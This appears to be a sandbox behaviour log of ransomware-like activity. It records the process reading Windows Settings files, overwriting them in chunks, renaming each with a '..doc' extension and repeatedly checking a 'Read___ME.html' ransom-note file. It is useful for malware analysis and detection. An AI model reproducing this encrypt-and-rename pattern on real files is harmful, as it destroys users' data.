File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, type = size, size_out = 1005	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, size = 8192, size_out = 1005	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, size = 1008	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, type = size, size_out = 1058	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, size = 8192, size_out = 1058	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, size = 1072	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, type = size, size_out = 1138	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, size = 8192, size_out = 1138	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, size = 1152	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms, type = size, size_out = 1141	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms, size = 8192, size_out = 1141	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms, size = 1152	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsChangeAccountPicture.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, type = size, size_out = 1120	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, size = 8192, size_out = 1120	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, size = 1120	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, type = size, size_out = 1147	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, size = 8192, size_out = 1147	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, size = 1152	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, type = size, size_out = 1193	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, size = 8192, size_out = 1193	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, size = 1200	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, type = size, size_out = 1193	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, size = 8192, size_out = 1193	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, size = 1200	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, type = size, size_out = 1181	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, size = 8192, size_out = 1181	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, size = 1184	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, type = size, size_out = 1171	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, size = 8192, size_out = 1171	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, size = 1184	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, size = 768	1	Fn Data
